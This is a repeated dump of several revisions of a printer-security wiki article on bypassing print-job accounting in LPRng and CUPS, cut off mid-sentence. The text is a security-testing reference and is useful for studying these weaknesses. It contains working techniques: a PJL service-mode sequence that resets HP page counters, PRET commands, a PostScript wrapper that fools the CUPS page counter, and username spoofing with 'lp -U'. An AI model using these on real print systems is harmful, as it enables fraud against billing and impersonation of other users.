system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecounter'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecounter 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Anyone who forward jobs to the (CUPS based) print server. However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies. <!-- % number of copies vs. density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- a65bc6ffe4ceb7b73710bdf36938552977e70bbe 123 122 2017-01-14T19:54:38Z Admin 1 /* Software page counters */ wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: lp -U nobody test.ps '''Who can perform this attack?''' Any anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecounter'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecounter 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Any anyone who forward jobs to the (CUPS based) print server. However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies. <!-- % number of copies vs. density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- 7bf564b8fec12bf1eec2135c1ad5252ef0c29a46 122 121 2017-01-14T19:54:11Z Admin 1 /* Software page counters */ wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: lp -U nobody test.ps '''Who can perform this attack?''' Any anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecounter'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecounter 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Any anyone who forward jobs to the (CUPS based) print server. (However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies.) <!-- % number of copies vs. density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- 8f9a3594a7c3bd4edcc02fa09bd7c66c6c89ef81 121 120 2017-01-14T19:53:56Z Admin 1 /* Software page counters */ wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: lp -U nobody test.ps '''Who can perform this attack?''' Any anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecounter'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecounter 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Any anyone who forward jobs to the (CUPS based) print server. (However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies.) <!-- % number of copies vs. density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- 3ee567120cd887ce7b692ad6da0c7de6f8c8e7ef 120 51 2017-01-14T19:53:31Z Admin 1 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: lp -U nobody test.ps '''Who can perform this attack?''' Any anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecounter'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecounter 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a 